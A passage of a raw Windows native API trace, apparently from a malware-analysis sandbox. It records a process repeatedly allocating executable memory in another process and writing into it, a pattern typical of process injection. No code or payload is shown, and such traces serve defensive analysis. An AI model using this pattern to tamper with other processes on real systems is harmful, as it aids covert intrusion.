ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.415] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.415] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a260, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.415] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.415] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca10*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca10*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.415] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.415] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.416] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.416] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.416] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.416] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.416] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.416] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.416] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.416] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.417] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.417] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.417] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a268, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.417] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.417] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca1e*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca1e*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.417] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.417] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.417] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.418] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.418] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.418] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.418] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.418] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.418] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.418] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.418] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.418] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.419] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a270, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.419] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.419] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.419] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.419] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.419] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.419] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.420] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.420] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.420] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.420] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.420] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.420] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.420] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a278, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.420] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.421] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.421] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.421] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.421] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.421] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.421] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.422] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.422] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.422] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.422] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.422] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.422] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a280, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.422] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.422] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.422] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.423] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.423] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.423] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.423] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.423] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.423] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.423] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.424] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.424] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.424] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a288, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.424] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.424] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.424] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.424] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.424] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.424] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.425] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.425] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.425] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.425] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.425] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.425] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.425] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a290, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.425] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.426] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.426] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.426] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.426] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.426] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.426] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.426] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.426] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.427] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.427] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.427] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.427] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a298, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.427] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.427] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.427] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.427] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.428] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.428] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.428] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.428] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.428] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.428] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.428] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.428] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.429] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.429] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.429] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.429] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.429] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.430] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.430] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.430] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.430] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.430] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.430] 